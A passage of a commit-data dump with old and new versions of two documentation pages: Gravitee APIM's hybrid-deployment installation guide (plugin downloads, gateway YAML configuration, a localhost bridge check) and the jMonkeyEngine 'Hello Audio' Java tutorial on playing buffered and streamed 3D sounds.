picture\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/installation-guide\/installation_guide_hybrid_deployment.adoc","new_file":"pages\/apim\/3.x\/installation-guide\/installation_guide_hybrid_deployment.adoc","new_contents":"[[gravitee-installation-hybrid-deployment]]\n= Hybrid deployment\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_installguide_hybrid_deployment.html\n:page-folder: apim\/installation-guide\n:page-description: Gravitee.io API Management - Hybrid deployment\n:page-keywords: Gravitee.io, API Platform, API Management, API Gateway, oauth2, openid, documentation, manual, guide, reference, api\n:page-layout: apim3x\n\n== 
Overview\nWhen you are running a hybrid architecture (i.e. a mix between on-premise and cloud deployment), there are constraints\n(which can be just technical constraints or cost constraints) preventing you from deploying all the components required by\nAPIM in each data center.\n\nAPIM presents a solution in the form of hybrid components (in the form of plugins), freeing you from these constraints so that you can find a new way to define\nyour architecture and deployment vision.\n\nWe can describe this as _hybrid mode_ or _hybrid deployment_.\n\n== Architecture\n\nThis is a typical hybrid APIM architecture:\n\n.Deployment architecture\nimage::apim\/3.x\/installation\/hybrid\/hybrid_deployment_architecture.png[Hybrid deployment architecture]\n\n== Configuration\n\nFor APIM Gateway to work in this architecture, you need two components:\n\n* A _technical API gateway_ (shown in green in the diagram) which exposes new HTTP services used to bridge HTTP calls to the\n underlying repository (which can be any of our supported repositories, including MongoDB, JDBC and so on)\n\n* A standard APIM Gateway (shown in red in the diagram) with the default repository plugin switched to a new\nHTTP bridge repository plugin\n\nWith this infrastructure, the standard APIM Gateway can communicate with the technical API gateway\nthrough a secure HTTP\/S channel, and your cloud data center does not need a datastore installation.\n\nNOTE: What we are describing as a technical API gateway is, in fact, a standard APIM Gateway which has been augmented with\na new plugin.\n\n=== APIM Gateway - HTTP bridge (server)\n\n==== Installation\n\nTo expose the new HTTP API, you need to install a new plugin inside the `plugins` directory of APIM Gateway.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-server-${PLUGIN_VERSION}.zip\n----\n\n[NOTE]\n====\nYou can remove some of the existing plugins available by default in APIM Gateway: the sync service,\nall the cache services, the policies and the resources.\n\nFor example, in Gravitee.io APIM 1.18.0, the `plugins` directory contains the following files:\n\n gravitee-gateway-services-localregistry-1.18.0.zip\n gravitee-gateway-services-ratelimit-1.2.0.zip\n gravitee-gateway-services-monitoring-1.18.0.zip\n gravitee-gateway-services-node-healthcheck-1.18.0.zip\n gravitee-reporter-elasticsearch-1.18.0.zip\n gravitee-reporter-file-1.3.0.zip\n gravitee-repository-ehcache-1.0.0.zip\n gravitee-repository-gateway-bridge-http-server-1.0.0.zip\n gravitee-repository-mongodb-1.18.0.zip\n\n====\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nservices:\n bridge:\n http:\n enabled: true\n port: 18092\n host: localhost\n authentication:\n # authentication type to be used for the core services\n # - none : to disable authentication\n # - basic : to use basic authentication\n # default is \"basic\"\n type: basic\n users:\n admin: adminadmin\n----\n\n==== Check the APIM Gateway node is running\n\nYou can test that your APIM Gateway node is running by sending an HTTP request to port `18092` on `localhost`:\n\n[source,bash]\n----\n$ curl -X GET http:\/\/localhost:18092\/_bridge\/apis\n----\n\nYou should receive a response containing an 
empty array or a list of APIs.\n\n=== APIM Gateway - HTTP repository (client)\n\n==== Installation\n\nTo consume the HTTP bridge, you need to replace default repository plugins (usually a MongoDB repository) with\na new HTTP repository in the APIM Gateway `plugins` directory.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-client-${PLUGIN_VERSION}.zip\n----\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nmanagement:\n type: http\n http:\n url: http:\/\/localhost:18092\/\n keepAlive: true\n idleTimeout: 30000\n connectTimeout: 10000\n authentication:\n basic:\n username: admin\n password: adminadmin\n----\n\n== Start the APIM Gateways\n\nStart the APIM Gateways. Your consumers will be able to call APIM Gateway with the HTTP repository as usual.\n","old_contents":"[[gravitee-installation-hybrid-deployment]]\n= Hybrid deployment\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_installguide_hybrid_deployment.html\n:page-folder: apim\/installation-guide\n:page-description: Gravitee.io API Management - Hybrid deployment\n:page-keywords: Gravitee.io, API Platform, API Management, API Gateway, oauth2, openid, documentation, manual, guide, reference, api\n:page-layout: apim3x\n\n== Overview\nWhen you are running a hybrid architecture (i.e. a mix between on-premise and cloud deployment), there are constraints\n(which can be just technical constraints or cost constraints) preventing you from deploying all the components required by\nAPIM in each data center.\n\nAPIM presents a solution in the form of hybrid components (in the form of plugins), freeing you from these constraints so that you can find a new way to define\nyour architecture and deployment vision.\n\nWe can describe this as _hybrid mode_ or _hybrid deployment_.\n\n== Architecture\n\nThis is a typical hybrid APIM architecture:\n\n.Deployment architecture\nimage::apim\/3.x\/installation\/hybrid\/hybrid_deployment_architecture.png\n\n== Configuration\n\nFor APIM Gateway to work in this architecture, you need two components:\n\n* A _technical API gateway_ (shown in green in the diagram) which exposes new HTTP services used to bridge HTTP calls to the\n underlying repository (which can be any of our supported repositories, including MongoDB, JDBC and so on)\n\n* A standard APIM Gateway (shown in red on the schema) with the default repository plugin switched to a new\nHTTP bridge repository plugin\n\nWith this infrastructure the standard APIM Gateway can communicate with the technical API gateway\nthrough a secure HTTP\/S channel, and your cloud data center does not need a datastore installation.\n\nNOTE: What we are describing as a technical API gateway is, in fact, a standard APIM Gateway which has been augmented with\na new plugin.\n\n=== APIM Gateway - HTTP bridge (server)\n\n==== Installation\n\nTo expose the new HTTP API, you need Sto install a new plugin inside the `plugins` directory of APIM Gateway.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins 
https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-server-${PLUGIN_VERSION}.zip\n----\n\n[NOTE]\n====\nYou need to remove some of the existing plugins available by default in APIM Gateway: the sync service,\nall the cache services, the policies and the resources.\n\nFor example, in Gravitee.io APIM 1.18.0, the `plugins` directory contains the following files :\n\n gravitee-gateway-services-localregistry-1.18.0.zip\n gravitee-gateway-services-ratelimit-1.2.0.zip\n gravitee-gateway-services-monitoring-1.18.0.zip\n gravitee-gateway-services-node-healthcheck-1.18.0.zip\n gravitee-reporter-elasticsearch-1.18.0.zip\n gravitee-reporter-file-1.3.0.zip\n gravitee-repository-ehcache-1.0.0.zip\n gravitee-repository-gateway-bridge-http-server-1.0.0.zip\n gravitee-repository-mongodb-1.18.0.zip\n\n====\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nservices:\n bridge:\n http:\n enabled: true\n port: 18092\n host: localhost\n authentication:\n # authentication type to be used for the core services\n # - none : to disable authentication\n # - basic : to use basic authentication\n # default is \"basic\"\n type: basic\n users:\n admin: adminadmin\n----\n\n==== Check the APIM Gateway node is running\n\nYou can test that your APIM Gateway node is running by sending an HTTP request to port `8082` on `localhost`:\n\n[source,bash]\n----\n$ curl -X GET http:\/\/localhost:18092\/_bridge\/apis\n----\n\nYou should receive a response containing an empty array or a list of APIs.\n\n=== APIM Gateway - HTTP repository (client)\n\n==== Installation\n\nTo consume the HTTP bridge, you need to replace default repository plugins (usually a MongoDB repository) with\na new HTTP repository in the APIM Gateway `plugins` directory.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-client-${PLUGIN_VERSION}.zip\n----\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nmanagement:\n type: http\n http:\n url: http:\/\/localhost:18092\/\n keepAlive: true\n idleTimeout: 30000\n connectTimeout: 10000\n authentication:\n basic:\n username: admin\n password: adminadmin\n----\n\n== Start the APIM Gateways\n\nStart the APIM Gateways. 
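To check the link from code as well, here is a minimal sketch (it is not part of the Gravitee distribution) that replays the bridge check from the section above using Java 11's built-in HTTP client; the host, port and credentials are the ones from the sample `gravitee.yml`, so adjust them to your own setup:\n\n[source,java]\n----\nimport java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\nimport java.util.Base64;\n\npublic class BridgeCheck {\n public static void main(String[] args) throws Exception {\n \/\/ Credentials as configured in the bridge section of gravitee.yml\n String credentials = Base64.getEncoder()\n .encodeToString(\"admin:adminadmin\".getBytes());\n HttpRequest request = HttpRequest.newBuilder()\n .uri(URI.create(\"http:\/\/localhost:18092\/_bridge\/apis\"))\n .header(\"Authorization\", \"Basic \" + credentials)\n .GET()\n .build();\n HttpResponse<String> response = HttpClient.newHttpClient()\n .send(request, HttpResponse.BodyHandlers.ofString());\n \/\/ Expect HTTP 200 with an empty array or a list of APIs\n System.out.println(response.statusCode() + \" \" + response.body());\n }\n}\n----\n\n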
Your consumers will be able to call APIM Gateway with the HTTP repository as usual.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d9a98f96c5ca2da248bfa564b445604db9b6001","subject":"Update hello_audio.adoc","message":"Update hello_audio.adoc\n\nChanged tip text to Admonition.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/beginner\/hello_audio.adoc","new_file":"src\/docs\/asciidoc\/jme3\/beginner\/hello_audio.adoc","new_contents":"= jMonkeyEngine 3 Tutorial (11) - Hello Audio\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: sound, documentation, beginner, intro\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nPrevious: <<jme3\/beginner\/hello_terrain#,Hello Terrain>>, Next: <<jme3\/beginner\/hello_effects#,Hello Effects>>\n\nThis tutorial explains how to add 3D sound to a game, and how to make sounds play together with events, such as clicking. You learn how to use an Audio Listener and Audio Nodes. You also make use of an Action Listener and a MouseButtonTrigger from the previous <<jme3\/beginner\/hello_input_system#,Hello Input>> tutorial to make a mouse click trigger a gun shot sound.\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select \u201cProperties, go to \u201cLibraries, press \u201cAdd Library and add the \u201cjme3-test-data library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.audio.AudioNode;\nimport com.jme3.audio.AudioData.DataType;\nimport com.jme3.input.MouseInput;\nimport com.jme3.input.controls.ActionListener;\nimport com.jme3.input.controls.MouseButtonTrigger;\nimport com.jme3.material.Material;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\n\n\/** Sample 11 - playing 3D audio. *\/\npublic class HelloAudio extends SimpleApplication {\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n private Geometry player;\n\n public static void main(String[] args) {\n HelloAudio app = new HelloAudio();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n flyCam.setMoveSpeed(40);\n \n \/** just a blue box floating in space *\/\n Box box1 = new Box(1, 1, 1);\n player = new Geometry(\"Player\", box1);\n Material mat1 = new Material(assetManager,\"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat1.setColor(\"Color\", ColorRGBA.Blue);\n player.setMaterial(mat1);\n rootNode.attachChild(player);\n\n \/** custom init methods, see below *\/\n initKeys();\n initAudio();\n }\n\n \/** We create two audio nodes. *\/\n private void initAudio() {\n \/* gun shot sound is to be triggered by a mouse click. *\/\n audio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n \/* nature sound - keeps playing in a loop. 
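*\/\n \/\/ DataType.Stream means the file is decoded while it plays, which suits a\n \/\/ long ambient track; the gun shot above uses DataType.Buffer and is\n \/\/ decoded up front. See \"Buffered or Streaming?\" below.\n \/* the looping nature node: 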
*\/\n audio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Ocean Waves.ogg\", DataType.Stream);\n audio_nature.setLooping(true); \/\/ activate continuous playing\n audio_nature.setPositional(true); \n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n\n \/** Move the listener with the camera - for 3D audio. *\/\n @Override\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n}\n\n----\n\nWhen you run the sample, you should see a blue cube. You should hear a nature-like ambient sound. When you click, you hear a loud shot.\n\n\n== Understanding the Code Sample\n\nIn the `simpleInitApp()` method, you create a simple blue cube geometry called `player` and attach it to the scene \u2013 this is just arbitrary sample content, so you see something when running the audio sample.\n\nLet's have a closer look at `initAudio()` to learn how to use `AudioNode`s.\n\n\n== AudioNodes\n\nAdding sound to your game is quite simple: Save your audio files into your `assets\/Sound` directory. JME3 supports both Ogg Vorbis (.ogg) and Wave (.wav) file formats.\n\nFor each sound, you create an AudioNode. You can use an AudioNode like any node in the JME scene graph, e.g. attach it to other Nodes. You create one node for a gunshot sound, and one node for a nature sound.\n\n[source,java]\n----\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n\n----\n\nLook at the custom `initAudio()` method: Here you initialize the sound objects and set their parameters.\n\n[source,java]\n----\n\naudio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n ...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Ocean Waves.ogg\", DataType.Stream);\n\n----\n\nThese two lines create new sound nodes from the given audio files in the AssetManager. The `DataType.Buffer` flag means that you want to buffer these sounds before playing. (If you set this flag to `DataType.Stream`, the sound will be streamed, which makes sense for really long sounds.)\n\nYou want the gunshot sound to play _once_ (you don't want it to loop). You also specify its volume as a gain factor (at 0, sound is muted, at 2, it is twice as loud, etc.).\n\n[source,java]\n----\n\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n----\n\n\n[IMPORTANT]\n====\nNote that setPositional(false) is pretty important when you use stereo sounds. Positional sounds must always be mono audio files, otherwise the engine will remind you with a crash.\n====\n\n\nThe nature sound is different: You want it to loop _continuously_ as background sound. This is why you set looping to true, and immediately call the play() method on the node. 
You also choose to set its volume to 3.\n\n[source,java]\n----\n\n audio_nature.setLooping(true); \/\/ activate continuous playing\n ...\n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n----\n\nHere you make audio_nature a positional sound that comes from a certain place. For that you give the node an explicit translation; in this example, you choose Vector3f.ZERO (which stands for the coordinates `0.0f,0.0f,0.0f`, the center of the scene). Since jME supports 3D audio, you are now able to hear this sound coming from this particular location. Making the sound positional is optional. If you don't use these lines, the ambient sound comes from every direction.\n\n[source,java]\n----\n\n ...\n audio_nature.setPositional(true);\n audio_nature.setLocalTranslation(Vector3f.ZERO.clone());\n ...\n\n----\n\n[TIP]\n====\nAttach AudioNodes into the scene graph like all nodes, to make certain that moving nodes stay up-to-date. If you don't attach them, they are still audible and you don't get an error message, but 3D sound will not work as expected. AudioNodes can be attached directly to the root node, or they can be attached inside a node that is moving through the scene, and both the AudioNode and the 3D position of the sound it is generating will move accordingly.\n====\n\n[TIP]\n====\nplayInstance always plays the sound from the position of the AudioNode, so multiple gunshots from one gun (for example) can be generated this way; however, if multiple guns are firing at once, an AudioNode is needed for each one.\n====\n\n\n== Triggering Sound\n\nLet's have a closer look at `initKeys()`: As you learned in previous tutorials, you use the `inputManager` to respond to user input. Here you add a mapping for a left mouse button click, and name this new action `Shoot`.\n\n[source,java]\n----\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n----\n\nSetting up the ActionListener should also be familiar from previous tutorials. You declare that, when the trigger (the mouse button) is pressed and released, you want to play a gun sound.\n\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\nYou want to be able to shoot fast repeatedly, so you do not want to wait for the previous gunshot sound to end before the next one can start. This is why you play this sound using the `playInstance()` method. This means that every click starts a new instance of the sound, so two instances can overlap. You set this sound not to loop, so each instance only plays once, as you would expect of a gunshot.\n\n\n== Ambient or Situational?\n\nThe two sounds are two different use cases:\n\n* A gunshot is situational. You want to play it only once, right when it is triggered.\n** This is why you `setLooping(false)`.\n\n* The nature sound is an ambient background noise. You want it to start playing from the start, as long as the game runs.\n** This is why you `setLooping(true)`.\n\n\nNow every sound knows whether it should loop or not. 
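\n\nAs a compact recap, the two configurations differ in only a few calls. The helper below is a sketch for illustration (the class and method names are made up and are not part of the jME API), showing how either style could be applied to an existing AudioNode:\n\n[source,java]\n----\nimport com.jme3.audio.AudioNode;\n\n\/** Sketch: the two playback styles of this tutorial, side by side. *\/\npublic final class AudioStyles {\n\n \/** Ambient background noise: starts immediately and repeats forever. *\/\n public static void playAsAmbient(AudioNode node) {\n node.setLooping(true); \/\/ repeat when the end of the sound is reached\n node.play(); \/\/ one continuous playback\n }\n\n \/** Situational effect: call this from an input handler, once per event. *\/\n public static void playAsOneShot(AudioNode node) {\n node.setLooping(false); \/\/ each instance plays exactly once\n node.playInstance(); \/\/ instances may overlap on rapid triggers\n }\n}\n----\n\nIn the sample above, `audio_nature` goes through the first path once at startup, while `audio_gun` goes through the second on every `Shoot` event.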
\n\nApart from the looping boolean, another difference is where `play()` or `playInstance()` is called on those nodes:\n\n* You start playing the background nature sound right after you have created it, in the initAudio() method.\n[source,java]\n----\n audio_nature.play(); \/\/ play continuously!\n\n----\n\n* The gunshot sound, however, is triggered situationally, once, only as part of the `Shoot` input action that you defined in the ActionListener.\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\n\n\n== Buffered or Streaming?\n\nAs of 3.1-alpha2, the Enum in the AudioNode constructor defines whether the audio is buffered or streamed. For example:\n\n[source,java]\n----\naudio_gunshot = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer); \/\/ buffered\n...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream); \/\/ streamed \n----\n\nTypically, you stream long sounds, and buffer short sounds.\n\n+++<strike>Note that streamed sounds can not loop (i.e. setLooping will not work as you expect). Check the getStatus on the node and if it has stopped recreate the node.<\/strike>+++ (As of 3.1-alpha2, this is no longer true.)\nIf you still run 3.0, the struck-out note above still applies, and a simple boolean is used in the constructor instead of `DataType`.\n\n\n== Play() or PlayInstance()?\n[cols=\"2\", options=\"header\"]\n|===\n\na|audio.play()\na|audio.playInstance()\n\na|Plays buffered sounds.\na|Plays buffered sounds. \n\na|Plays streamed sounds.\na|Cannot play streamed sounds.\n\na|The same sound cannot play twice at the same time.\na|The same sounds can play multiple times and overlap.\n\n|===\n\n\n== Your Ear in the Scene\n\nTo create a 3D audio effect, JME3 needs to know the position of the sound source, and the position of the ears of the player. The ears are represented by a 3D Audio Listener object. The `listener` object is a default object in a SimpleApplication.\n\nIn order to make the most of the 3D audio effect, you must use the `simpleUpdate()` method to move and rotate the listener (the player's ears) together with the camera (the player's eyes).\n\n[source,java]\n----\n\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n----\n\nIf you don't do that, the results of 3D audio will be quite random.\n\n\n== Global, Directional, Positional?\n\nIn this example, you defined the nature sound as coming from a certain position, but not the gunshot sound. This means your gunshot is global and can be heard everywhere with the same volume. JME3 also supports directional sounds, which you can only hear from a certain direction. \n\nIt makes equal sense to make the gunshot positional, and let the ambient sound come from every direction. How do you decide which type of 3D sound to use from case to case?\n\n* In a game with moving enemies you may want to make the gun shot or footsteps positional sounds. In these cases you must move the AudioNode to the location of the enemy before `playInstance()`ing it. This way a player with stereo speakers hears from which direction the enemy is coming.\n* Similarly, you may have game levels where you want one background sound to play globally. 
In this case, you would make the AudioNode neither positional nor directional (set both to false).\n* If you want sound to be \u201cabsorbed by the walls and only broadcast in one direction, you would make this AudioNode directional. This tutorial does not discuss directional sounds, you can read about <<jme3\/advanced\/audio#,Advanced Audio>> here.\n\nIn short, you must choose in every situation whether it makes sense for a sound to be global, directional, or positional.\n\n\n== Conclusion\n\nYou now know how to add the two most common types of sound to your game: Global sounds and positional sounds. You can play sounds in two ways: Either continuously in a loop, or situationally just once. You know the difference between buffering short sounds and streaming long sounds. You know the difference between playing overlapping sound instances, and playing unique sounds that cannot overlap with themselves. You also learned to use sound files that are in either .ogg or .wav format.\n\n[TIP]\n====\nJME's Audio implementation also supports more advanced effects such as reverberation and Doppler effect. Use these \u201cpro features to make audio sound different depending on whether it's in the hallway, in a cave, outdoors, or in a carpeted room. Find out more about environmental effects from the sample code included in the jme3test directory and from the advanced <<jme3\/advanced\/audio#,Audio>> docs.\n====\n\nWant some fire and explosions to go with your sounds? Read on to learn more about <<jme3\/beginner\/hello_effects#,effects>>.\n\n'''\n\nSee also:\n\n* <<jme3\/advanced\/audio#,Audio>>\n","old_contents":"= jMonkeyEngine 3 Tutorial (11) - Hello Audio\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: sound, documentation, beginner, intro\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nPrevious: <<jme3\/beginner\/hello_terrain#,Hello Terrain>>, Next: <<jme3\/beginner\/hello_effects#,Hello Effects>>\n\nThis tutorial explains how to add 3D sound to a game, and how to make sounds play together with events, such as clicking. You learn how to use an Audio Listener and Audio Nodes. You also make use of an Action Listener and a MouseButtonTrigger from the previous <<jme3\/beginner\/hello_input_system#,Hello Input>> tutorial to make a mouse click trigger a gun shot sound.\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select \u201cProperties, go to \u201cLibraries, press \u201cAdd Library and add the \u201cjme3-test-data library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.audio.AudioNode;\nimport com.jme3.audio.AudioData.DataType;\nimport com.jme3.input.MouseInput;\nimport com.jme3.input.controls.ActionListener;\nimport com.jme3.input.controls.MouseButtonTrigger;\nimport com.jme3.material.Material;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\n\n\/** Sample 11 - playing 3D audio. 
*\/\npublic class HelloAudio extends SimpleApplication {\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n private Geometry player;\n\n public static void main(String[] args) {\n HelloAudio app = new HelloAudio();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n flyCam.setMoveSpeed(40);\n \n \/** just a blue box floating in space *\/\n Box box1 = new Box(1, 1, 1);\n player = new Geometry(\"Player\", box1);\n Material mat1 = new Material(assetManager,\"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat1.setColor(\"Color\", ColorRGBA.Blue);\n player.setMaterial(mat1);\n rootNode.attachChild(player);\n\n \/** custom init methods, see below *\/\n initKeys();\n initAudio();\n }\n\n \/** We create two audio nodes. *\/\n private void initAudio() {\n \/* gun shot sound is to be triggered by a mouse click. *\/\n audio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n \/* nature sound - keeps playing in a loop. *\/\n audio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Ocean Waves.ogg\", DataType.Stream);\n audio_nature.setLooping(true); \/\/ activate continuous playing\n audio_nature.setPositional(true); \n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n\n \/** Move the listener with the a camera - for 3D audio. *\/\n @Override\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n}\n\n----\n\nWhen you run the sample, you should see a blue cube. You should hear a nature-like ambient sound. When you click, you hear a loud shot.\n\n\n== Understanding the Code Sample\n\nIn the `initSimpleApp()` method, you create a simple blue cube geometry called `player` and attach it to the scene \u2013 this is just arbitrary sample content, so you see something when running the audio sample.\n\nLet's have a closer look at `initAudio()` to learn how to use `AudioNode`s.\n\n\n== AudioNodes\n\nAdding sound to your game is quite simple: Save your audio files into your `assets\/Sound` directory. JME3 supports both Ogg Vorbis (.ogg) and Wave (.wav) file formats.\n\nFor each sound, you create an AudioNode. You can use an AudioNode like any node in the JME scene graph, e.g. attach it to other Nodes. 
You create one node for a gunshot sound, and one node for a nature sound.\n\n[source,java]\n----\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n\n----\n\nLook at the custom `initAudio()` method: Here you initialize the sound objects and set their parameters.\n\n[source,Java]\n----\n\naudio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n ...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream);\n\n----\n\nThese two lines create new sound nodes from the given audio files in the AssetManager. The `DataType.Buffer` flag means that you want to buffer these sounds before playing. (If you set this flag to `DataType.Stream`, the sound will be streamed, which makes sense for really long sounds.)\n\nYou want the gunshot sound to play _once_ (you don't want it to loop). You also specify its volume as gain factor (at 0, sound is muted, at 2, it is twice as loud, etc.).\n\n[source,java]\n----\n\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n----\n\n\n[IMPORTANT]\n====\nNote that setPositional(false) is pretty important when you use stereo sounds. Positional sounds must always be mono audio files, otherwise the engine will remind it to you with a crash.\n====\n\n\nThe nature sound is different: You want it to loop _continuously_ as background sound. This is why you set looping to true, and immediately call the play() method on the node. You also choose to set its volume to 3.\n\n[source,java]\n----\n\n audio_nature.setLooping(true); \/\/ activate continuous playing\n ...\n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n----\n\nHere you make audio_nature a positional sound that comes from a certain place. For that you give the node an explicit translation, in this example, you choose Vector3f.ZERO (which stands for the coordinates `0.0f,0.0f,0.0f`, the center of the scene.) Since jME supports 3D audio, you are now able to hear this sound coming from this particular location. Making the sound positional is optional. If you don't use these lines, the ambient sound comes from every direction.\n\n[source,java]\n----\n\n ...\n audio_nature.setPositional(true);\n audio_nature.setLocalTranslation(Vector3f.ZERO.clone());\n ...\n\n----\n\n*Tip:* Attach AudioNodes into the scene graph like all nodes, to make certain moving nodes stay up-to-date. If you don't attach them, they are still audible and you don't get an error message but 3D sound will not work as expected. 